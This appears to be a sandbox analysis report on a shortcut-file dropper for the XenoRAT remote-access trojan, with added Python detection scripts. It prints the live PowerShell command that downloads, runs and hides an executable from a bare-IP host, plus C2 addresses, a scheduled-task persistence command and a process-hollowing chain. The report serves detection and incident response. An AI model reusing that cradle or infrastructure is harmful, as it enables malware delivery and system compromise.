Analysis

max time kernel: 150s
max time network: 158s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27-07-2024 09:38

Static task: static1
Behavioral task: behavioral1
Sample: 1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk
Resource: win7-20240704-en
General

Target: 1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk
Size: 2KB
MD5: 4db66f511c6604f1be1ae032b84f8358
SHA1: 8ab73293cf42ead05326874845622cea78822c8f
SHA256: 1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7
SHA512: 2cf294db093bbe00ce504d2817dced1d62d7eb8af4a7183836fb4af0288f7e5018cd2226bea522ad5464b911317bd184bb36303e766fa4a59239f87878510c67
Malware Config

Extracted (download URL):
http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe

Extracted (family: xenorat):
45.66.231.63
Holid_rat_nd8859g
delay: 60400
install_path: appdata
port: 1243
startup_name: HDdisplay
Signatures

Blocklisted process makes network request (1 IoC)
flow  pid   Process
7     1816  PoWersheLl.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Run Powershell and hide display window.
pid   Process
1816  PoWersheLl.exe
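The signature above records only that PowerShell ran with a hidden window. The command line captured in the process tree carries several more traits a detection engineer keys on: a case-mangled binary name (PoWersheLl.exe, hiDdEn), -ExecutionPolicy -Bypass with a stray dash, a System.Net.WebClient.DownloadFile cradle fetching a .exe from a bare IP on port 5679, immediate execution of the dropped file, and the Hidden attribute set on it afterwards. The Python below is an added example, not part of the sandbox report: it scores constructed Sysmon-style process-creation events (the first reproduces the report's command line; the two benign baselines are made up) with weighted regex rules applied to the case-folded command line. The field names, rule weights and alert threshold are this example's own choices.

```python
"""Score PowerShell process-creation events for download-cradle traits.

Added example. Event shape mimics Sysmon Event ID 1 fields (ParentImage,
Image, CommandLine); rule weights and the alert threshold are arbitrary.
"""
import re

# Constructed events. The first reproduces the command line from the report;
# the other two are benign baselines invented for this example.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Windows\system32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe",
        "CommandLine": (
            r'"C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe" '
            "-ExecutionPolicy -Bypass -WindowStyle hiDdEn -hiDdEn -Command "
            "PkgMgr.exe;(new-object System.Net.WebClient).DownloadFile("
            "'http://94.156.67.244:5679/abincontents/"
            "sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/"
            "ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe',"
            "'DisplayResolution.exe');./'DisplayResolution.exe';"
            "(get-item 'DisplayResolution.exe').Attributes += 'Hidden';"
        ),
    },
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -File C:\Scripts\inventory.ps1',
    },
    {
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Corp\update.ps1",
    },
]

# (tag, weight, pattern) applied to the lower-cased command line. The stray
# dash in "-ExecutionPolicy -Bypass" is tolerated by the optional "-?".
RULES = [
    ("exec_policy_bypass", 1, r"-e(?:x\w*|p)\s+-?bypass"),
    ("hidden_window", 2, r"-w(?:indowstyle)?\s+-?hidden"),
    ("download_cradle", 3, r"net\.webclient|downloadfile\(|downloadstring\(|invoke-webrequest|\biwr\b|start-bitstransfer"),
    ("bare_ip_url", 2, r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/"),
    ("runs_dropped_exe", 2, r"\./'?[\w.-]+\.exe|start-process\s"),
    ("sets_hidden_attr", 1, r"attributes\s*\+=\s*'hidden'"),
]
COMPILED = [(tag, weight, re.compile(pat)) for tag, weight, pat in RULES]

# Spellings Windows itself and well-behaved tooling use for the host binary.
CANONICAL = {"powershell.exe", "PowerShell.exe", "pwsh.exe"}
# Parents that indicate a script, shortcut or document launched the shell.
SCRIPT_HOST_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                       "winword.exe", "excel.exe", "outlook.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def first_token(cmdline):
    """Return argv[0] of a Windows command line (quoted or bare)."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        return s[1:].split('"', 1)[0]
    return s.split(None, 1)[0]


def is_case_mangled(name):
    # LNK/VBS droppers randomise case to dodge naive string matches; Windows
    # resolves the path regardless, so the mangling itself is the tell.
    return name.lower() in {n.lower() for n in CANONICAL} and name not in CANONICAL


def score_event(event):
    """Return (score, tags) for one process-creation event."""
    tags, score = [], 0
    cl = event["CommandLine"].lower()
    for tag, weight, rx in COMPILED:
        if rx.search(cl):
            tags.append(tag)
            score += weight
    if is_case_mangled(basename(event["Image"])) or is_case_mangled(basename(first_token(event["CommandLine"]))):
        tags.append("case_mangled_binary")
        score += 2
    if basename(event["ParentImage"]).lower() in SCRIPT_HOST_PARENTS:
        tags.append("script_host_parent")
        score += 1
    return score, tags


def triage(events, threshold=5):
    """Events whose weighted score reaches the threshold, oldest first."""
    alerts = []
    for ev in events:
        score, tags = score_event(ev)
        if score >= threshold:
            alerts.append({"image": ev["Image"], "score": score, "tags": tags})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["score"], alert["image"], ", ".join(alert["tags"]))
```

Scoring rather than matching any single rule keeps the benign `-ExecutionPolicy Bypass -File` deployment script (a common sight in managed environments) below the threshold, while the report's command line trips every rule and scores 14.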
Downloads MZ/PE file
Checks computer location settings (2 TTPs, 4 IoCs)
Looks up country code configured in the registry, likely geofence.
description        ioc                                                                                                     Process
Key value queried  \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation  efthfxj.sfx.exe
Key value queried  \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation  efthfxj.exe
Key value queried  \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation  cmd.exe
Key value queried  \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation  DisplayResolution.exe
Executes dropped EXE (12 IoCs)
pid   Process
60    DisplayResolution.exe
2800  efthfxj.sfx.exe
5116  efthfxj.exe
4852  efthfxj.exe
1428  efthfxj.exe
776   efthfxj.exe
4820  efthfxj.exe
3196  efthfxj.exe
4876  efthfxj.exe
4788  efthfxj.exe
1236  efthfxj.exe
2164  efthfxj.exe
Suspicious use of SetThreadContext (8 IoCs)
description                          pid   Process      procid_target
PID 5116 set thread context of 4852  5116  efthfxj.exe  102
PID 5116 set thread context of 1428  5116  efthfxj.exe  103
PID 5116 set thread context of 776   5116  efthfxj.exe  104
PID 5116 set thread context of 4820  5116  efthfxj.exe  106
PID 3196 set thread context of 4876  3196  efthfxj.exe  111
PID 3196 set thread context of 4788  3196  efthfxj.exe  112
PID 3196 set thread context of 1236  3196  efthfxj.exe  114
PID 3196 set thread context of 2164  3196  efthfxj.exe  115
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Program crash (4 IoCs)
pid   pid_target  Process       procid_target
3968  4788        WerFault.exe  112
4548  1428        WerFault.exe  103
3892  4876        WerFault.exe  111
2156  1236        WerFault.exe  114
System Location Discovery: System Language Discovery (1 TTP, 8 IoCs)
Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  efthfxj.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  schtasks.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  DisplayResolution.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  efthfxj.sfx.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  efthfxj.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  efthfxj.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  efthfxj.exe
Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid   Process
5104  schtasks.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid   Process
1816  PoWersheLl.exe
1816  PoWersheLl.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
description              pid   Process
Token: SeDebugPrivilege  1816  PoWersheLl.exe
Token: SeDebugPrivilege  5116  efthfxj.exe
Token: SeDebugPrivilege  3196  efthfxj.exe
Suspicious use of UnmapMainImage (1 IoC)
pid  Process
776  efthfxj.exe
Suspicious use of WriteProcessMemory (64 IoCs; identical entries collapsed, count in the last column)
description                       pid   Process                procid_target  entries
PID 4856 wrote to memory of 1816  4856  cmd.exe                88             2
PID 1816 wrote to memory of 60    1816  PoWersheLl.exe         89             3
PID 60 wrote to memory of 2536    60    DisplayResolution.exe  94             3
PID 2536 wrote to memory of 2800  2536  cmd.exe                97             3
PID 2800 wrote to memory of 5116  2800  efthfxj.sfx.exe        99             3
PID 5116 wrote to memory of 4852  5116  efthfxj.exe            102            8
PID 5116 wrote to memory of 1428  5116  efthfxj.exe            103            8
PID 5116 wrote to memory of 776   5116  efthfxj.exe            104            8
PID 5116 wrote to memory of 4820  5116  efthfxj.exe            106            8
PID 4852 wrote to memory of 3196  4852  efthfxj.exe            107            3
PID 3196 wrote to memory of 4876  3196  efthfxj.exe            111            8
PID 3196 wrote to memory of 4788  3196  efthfxj.exe            112            7
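Read together, the SetThreadContext, WriteProcessMemory, UnmapMainImage, Executes dropped EXE and Program crash tables describe a RunPE / process-hollowing loop: efthfxj.exe (PID 5116) starts a copy of its own image, writes to it eight times, resets the child's thread context and resumes it, and the XenoManager copy (PID 3196) repeats the sequence. Several hollowed children crash into WerFault, while one per stage survives and carries the chain on (4852 launches the XenoManager copy, 2164 registers the scheduled task). The Python below is an added example, not part of the report: it encodes the report's pids and tables as inline data, flags every SetThreadContext by a parent on its own freshly spawned child when both run the same image name, and labels each target by what happened next. The 2 to 3 writes that accompany ordinary process creation in this sandbox's logging are kept in the data for contrast; because the WriteProcessMemory table is capped at 64 entries, the last hollowing target (2164) shows zero recorded writes.

```python
"""Correlate sandbox signatures into process-hollowing findings (added example)."""
from collections import Counter, defaultdict

# Data transcribed from the report's tables; pids and image paths are the report's.
IMAGES = {
    4856: r"C:\Windows\system32\cmd.exe",
    1816: r"C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe",
    60: r"C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe",
    2536: r"C:\Windows\SysWOW64\cmd.exe",
    2800: r"C:\Users\Admin\AppData\Roaming\efthfxj.sfx.exe",
    5116: r"C:\Users\Admin\AppData\Roaming\efthfxj.exe",
    4852: r"C:\Users\Admin\AppData\Roaming\efthfxj.exe",
    1428: r"C:\Users\Admin\AppData\Roaming\efthfxj.exe",
    776: r"C:\Users\Admin\AppData\Roaming\efthfxj.exe",
    4820: r"C:\Users\Admin\AppData\Roaming\efthfxj.exe",
    3196: r"C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe",
    4876: r"C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe",
    4788: r"C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe",
    1236: r"C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe",
    2164: r"C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe",
    5104: r"C:\Windows\SysWOW64\schtasks.exe",
}
# child pid -> parent pid, from the process tree
PARENT = {1816: 4856, 60: 1816, 2536: 60, 2800: 2536, 5116: 2800,
          4852: 5116, 1428: 5116, 776: 5116, 4820: 5116, 3196: 4852,
          4876: 3196, 4788: 3196, 1236: 3196, 2164: 3196, 5104: 2164}
# (source pid, target pid) from "Suspicious use of SetThreadContext"
SET_THREAD_CONTEXT = [(5116, 4852), (5116, 1428), (5116, 776), (5116, 4820),
                      (3196, 4876), (3196, 4788), (3196, 1236), (3196, 2164)]
# (source, target) -> entries in "Suspicious use of WriteProcessMemory" (64-entry cap)
WRITE_PROCESS_MEMORY = Counter({
    (4856, 1816): 2, (1816, 60): 3, (60, 2536): 3, (2536, 2800): 3, (2800, 5116): 3,
    (5116, 4852): 8, (5116, 1428): 8, (5116, 776): 8, (5116, 4820): 8,
    (4852, 3196): 3, (3196, 4876): 8, (3196, 4788): 7,
})
# pid_target column of "Program crash" (WerFault -u -p <pid>)
CRASHED = {4788, 1428, 4876, 1236}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def find_hollowing(images, parent, stc, wpm, crashed):
    """Flag SetThreadContext by a parent on its own child when both run the
    same image: the RunPE sequence is CreateProcess(CREATE_SUSPENDED),
    unmap/overwrite the child's image, SetThreadContext, ResumeThread."""
    children = defaultdict(list)
    for child, par in parent.items():
        children[par].append(child)
    findings = []
    for src, dst in stc:
        if parent.get(dst) != src or basename(images[src]) != basename(images[dst]):
            continue
        if dst in crashed:
            outcome = "crashed"
        elif children[dst]:
            outcome = "spawned:" + ",".join(str(c) for c in sorted(children[dst]))
        else:
            outcome = "no further activity"
        findings.append({"injector": src, "target": dst,
                         "writes": wpm.get((src, dst), 0), "outcome": outcome})
    return findings


def summary():
    """Findings for this report keyed by hollowed target pid."""
    return {f["target"]: f for f in find_hollowing(
        IMAGES, PARENT, SET_THREAD_CONTEXT, WRITE_PROCESS_MEMORY, CRASHED)}


if __name__ == "__main__":
    for f in summary().values():
        print(f"{f['injector']} -> {f['target']}: {f['writes']} writes, {f['outcome']}")
```

The same-image test is what separates hollowing from a loader simply starting its next stage: 2800 (the SFX) writing to 5116 is a plain CreateProcess and is not reported, whereas every SetThreadContext in this report lands on a same-named child and is.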
Processes
[1] C:\Windows\system32\cmd.exe  (PID 4856)
    cmd /c C:\Users\Admin\AppData\Local\Temp\1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe  (PID 1816)
      "C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe" -ExecutionPolicy -Bypass -WindowStyle hiDdEn -hiDdEn -Command PkgMgr.exe;(new-object System.Net.WebClient).DownloadFile('http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe','DisplayResolution.exe');./'DisplayResolution.exe';(get-item 'DisplayResolution.exe').Attributes += 'Hidden';
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe  (PID 60)
        "C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 2536)
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\eystsdf.cmd" "
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Roaming\efthfxj.sfx.exe  (PID 2800)
            efthfxj.sfx.exe -pgtrfdewscbsdyethnymkdesppodtyuhngfszafugyRhvqxsdfHbgnmeG -dC:\Users\Admin\AppData\Roaming
            - Checks computer location settings
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
          [6] C:\Users\Admin\AppData\Roaming\efthfxj.exe  (PID 5116)
              "C:\Users\Admin\AppData\Roaming\efthfxj.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
              - System Location Discovery: System Language Discovery
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory
            [7] C:\Users\Admin\AppData\Roaming\efthfxj.exe  (PID 4852)
                C:\Users\Admin\AppData\Roaming\efthfxj.exe
                - Checks computer location settings
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious use of WriteProcessMemory
              [8] C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe  (PID 3196)
                  "C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe"
                  - Executes dropped EXE
                  - Suspicious use of SetThreadContext
                  - System Location Discovery: System Language Discovery
                  - Suspicious use of AdjustPrivilegeToken
                  - Suspicious use of WriteProcessMemory
                [9] C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe  (PID 4876)
                    C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    - Executes dropped EXE
                  [10] C:\Windows\SysWOW64\WerFault.exe  (PID 3892)
                       C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 84
                       - Program crash
                [9] C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe  (PID 4788)
                    C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    - Executes dropped EXE
                  [10] C:\Windows\SysWOW64\WerFault.exe  (PID 3968)
                       C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 80
                       - Program crash
                [9] C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe  (PID 1236)
                    C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    - Executes dropped EXE
                  [10] C:\Windows\SysWOW64\WerFault.exe  (PID 2156)
                       C:\Windows\SysWOW64\WerFault.exe -u -p 1236 -s 80
                       - Program crash
                [9] C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe  (PID 2164)
                    C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    - Executes dropped EXE
                    - System Location Discovery: System Language Discovery
                  [10] C:\Windows\SysWOW64\schtasks.exe  (PID 5104)
                       "schtasks.exe" /Create /TN "HDdisplay" /XML "C:\Users\Admin\AppData\Local\Temp\tmp35BC.tmp" /F
                       - System Location Discovery: System Language Discovery
                       - Scheduled Task/Job: Scheduled Task
            [7] C:\Users\Admin\AppData\Roaming\efthfxj.exe  (PID 1428)
                C:\Users\Admin\AppData\Roaming\efthfxj.exe
                - Executes dropped EXE
              [8] C:\Windows\SysWOW64\WerFault.exe  (PID 4548)
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 80
                  - Program crash
            [7] C:\Users\Admin\AppData\Roaming\efthfxj.exe  (PID 776)
                C:\Users\Admin\AppData\Roaming\efthfxj.exe
                - Executes dropped EXE
                - Suspicious use of UnmapMainImage
            [7] C:\Users\Admin\AppData\Roaming\efthfxj.exe  (PID 4820)
                C:\Users\Admin\AppData\Roaming\efthfxj.exe
                - Executes dropped EXE
[1] C:\Windows\SysWOW64\WerFault.exe  (PID 1960)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1428 -ip 1428
[1] C:\Windows\SysWOW64\WerFault.exe  (PID 4128)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 776 -ip 776
[1] C:\Windows\SysWOW64\WerFault.exe  (PID 2488)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4820 -ip 4820
[1] C:\Windows\SysWOW64\WerFault.exe  (PID 3528)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4876 -ip 4876
[1] C:\Windows\SysWOW64\WerFault.exe  (PID 2816)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4788 -ip 4788
[1] C:\Windows\SysWOW64\WerFault.exe  (PID 4780)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1236 -ip 1236
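The last step of the chain, schtasks.exe /Create /TN "HDdisplay" /XML "C:\Users\Admin\AppData\Local\Temp\tmp35BC.tmp" /F, registers the task from a temporary XML file the report does not reproduce. The task name matches startup_name in the extracted XenoRAT config, and install_path "appdata" matches the XenoManager directory under AppData\Roaming. On a live host the registered definition survives as a UTF-16 XML file under C:\Windows\System32\Tasks\<task name>, which is where an incident responder looks for it. The Python below is an added example, not part of the report: it parses task definitions under the Task Scheduler schema namespace and flags tasks whose Exec command or arguments point into user-writable directories. Both task bodies are constructed for the example; the HDdisplay one is what a dropper's /XML import plausibly looks like with the report's XenoManager path, the other is a benign baseline. Their contents are assumptions, not recovered from the sample.

```python
"""Audit Task Scheduler XML definitions for persistence from user-writable
paths (added example; task bodies below are constructed, not the sample's)."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Directories an unprivileged user can write to. A task whose action lives
# here was created by something running as that user, not by an installer.
USER_WRITABLE = re.compile(r"\\(?:appdata|temp|tmp|public|programdata|downloads)\\", re.I)
# Triggers that re-run the payload on every logon/boot (persistence, not scheduling).
PERSISTENCE_TRIGGERS = {"LogonTrigger", "BootTrigger", "RegistrationTrigger"}

# Constructed task bodies. Real files under C:\Windows\System32\Tasks are
# UTF-16 with an XML declaration; read them with open(path, encoding="utf-16").
SAMPLE_TASKS = {
    "HDdisplay": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Admin</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden><ExecutionTimeLimit>PT0S</ExecutionTimeLimit></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\\Users\\Admin\\AppData\\Roaming\\XenoManager\\efthfxj.exe</Command></Exec>
  </Actions>
</Task>""",
    "Corp Inventory": """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-07-27T09:00:00</StartBoundary><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\\Program Files\\Example\\inventory.exe</Command><Arguments>--quiet</Arguments></Exec>
  </Actions>
</Task>""",
}


def audit_task(name, xml_text):
    """Parse one task definition and return what it runs, when, and why it
    is (or is not) suspicious."""
    root = ET.fromstring(xml_text)
    findings, commands = [], []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", default="", namespaces=NS) or "").strip()
        args = (ex.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        commands.append((cmd + " " + args).strip())
        for part, label in ((cmd, "command"), (args, "arguments")):
            if USER_WRITABLE.search(part):
                findings.append(f"{label} in user-writable path: {part}")
    # Only the path finding is decisive; triggers and Hidden are context.
    suspicious = bool(findings)
    triggers_el = root.find("t:Triggers", NS)
    triggers = [c.tag.split("}")[-1] for c in triggers_el] if triggers_el is not None else []
    if PERSISTENCE_TRIGGERS & set(triggers):
        findings.append("runs at logon/boot: " + ",".join(triggers))
    hidden = (root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS) or "").strip().lower()
    if hidden == "true":
        findings.append("hidden from Task Scheduler UI")
    return {"name": name, "commands": commands, "triggers": triggers,
            "findings": findings, "suspicious": suspicious}


def audit_all(tasks):
    return [audit_task(name, xml) for name, xml in tasks.items()]


def suspicious_tasks(tasks):
    """Names of tasks whose action runs from a user-writable directory."""
    return [r["name"] for r in audit_all(tasks) if r["suspicious"]]


if __name__ == "__main__":
    for r in audit_all(SAMPLE_TASKS):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['name']}: {r['commands']} triggers={r['triggers']}")
        for f in r["findings"]:
            print("           -", f)
```

Walking C:\Windows\System32\Tasks with this check is a reasonable first sweep after a XenoRAT-style infection; note that /Create ... /F overwrites an existing task of the same name, so a benign-looking name is no reassurance and the action path is what matters.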
Network
-
DNS  8.8.8.8:53
  Request:  217.106.137.52.in-addr.arpa IN PTR
  Response: -
-
DNS  8.8.8.8:53
  Request:  172.214.232.199.in-addr.arpa IN PTR
  Response: -
-
HTTP  GET http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe
Process: PoWersheLl.exe
Remote address: 94.156.67.244:5679
Request:
GET /abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe HTTP/1.1
Host: 94.156.67.244:5679
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Sat, 27 Jul 2024 09:40:18 GMT
Content-Type: application/octet-stream
Content-Length: 629724
Last-Modified: Sat, 27 Jul 2024 06:37:56 GMT
Connection: keep-alive
ETag: "66a495c4-99bdc"
Accept-Ranges: bytes
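Of everything in the capture, only this exchange belongs to the dropper: a GET for an .exe from a bare IP on a non-standard port, issued by PoWersheLl.exe with no User-Agent at all (.NET WebClient sends none unless the script sets one), answered with application/octet-stream and a 629,724-byte body that the signature list records as an MZ/PE file. The g.bing.com and tse1.mm.bing.net traffic that follows is the Windows shell's own background activity and shows what the benign baseline looks like. The Python below is an added example, not part of the report: it scores constructed proxy-style flow records modelled on this capture (request headers and response metadata are copied from the report; the body prefixes, the benign rows' client process and some of their details are assumptions) and returns the flows worth an analyst's attention.

```python
"""Triage HTTP flow records for script-driven payload downloads (added example)."""
import re
from ipaddress import ip_address

# Interpreters and LOLBins that should rarely be the client of a file download.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
COMMON_PORTS = {80, 443, 8080, 8443}
EXEC_EXT = re.compile(r"\.(?:exe|dll|scr|ps1|vbs|hta|msi)$", re.I)

# Constructed flow records modelled on the capture above. Header values are the
# report's; body_prefix and the benign rows' process are assumptions.
FLOWS = [
    {
        "process": "PoWersheLl.exe", "host": "94.156.67.244", "port": 5679, "method": "GET",
        "path": "/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe",
        "req_headers": {"Host": "94.156.67.244:5679", "Connection": "Keep-Alive"},
        "status": 200,
        "resp_headers": {"Content-Type": "application/octet-stream", "Content-Length": "629724"},
        "body_prefix": b"MZ\x90\x00",  # assumed; the report only says "Downloads MZ/PE file"
    },
    {
        "process": None, "host": "g.bing.com", "port": 443, "method": "GET",
        "path": "/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541",
        "req_headers": {"host": "g.bing.com", "accept-encoding": "gzip, deflate",
                        "user-agent": "WindowsShellClient/9.0.40929.0 (Windows)"},
        "status": 204, "resp_headers": {}, "body_prefix": b"",
    },
    {
        "process": None, "host": "tse1.mm.bing.net", "port": 443, "method": "GET",
        "path": "/th?id=OADD2.10239340418590_1Z5SLYPYIFLU5OB7B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90",
        "req_headers": {"host": "tse1.mm.bing.net", "accept": "*/*",
                        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041"},
        "status": 200, "resp_headers": {"content-type": "image/jpeg", "content-length": "525311"},
        "body_prefix": b"\xff\xd8\xff",  # JPEG SOI marker, assumed
    },
]


def is_bare_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def score_flow(flow):
    """Return the list of suspicious traits seen on one HTTP flow."""
    tags = []
    req = {k.lower(): v for k, v in flow["req_headers"].items()}
    resp = {k.lower(): v for k, v in flow["resp_headers"].items()}
    if is_bare_ip(flow["host"]):
        tags.append("bare_ip_host")
    if flow["port"] not in COMMON_PORTS:
        tags.append("uncommon_port")
    if "user-agent" not in req:
        tags.append("no_user_agent")
    if EXEC_EXT.search(flow["path"].split("?")[0]):
        tags.append("executable_uri")
    if (flow["process"] or "").lower() in SCRIPT_HOSTS:
        tags.append("script_host_client")
    if flow["status"] == 200:
        if resp.get("content-type", "").startswith("application/octet-stream"):
            tags.append("octet_stream_response")
        if flow.get("body_prefix", b"").startswith(b"MZ"):
            tags.append("pe_payload")
    return tags


def triage_flows(flows, min_tags=3):
    """(host, port, tags) for flows with at least min_tags traits."""
    out = []
    for flow in flows:
        tags = score_flow(flow)
        if len(tags) >= min_tags:
            out.append((flow["host"], flow["port"], tags))
    return out


if __name__ == "__main__":
    for host, port, tags in triage_flows(FLOWS):
        print(f"{host}:{port}  {', '.join(tags)}")
```

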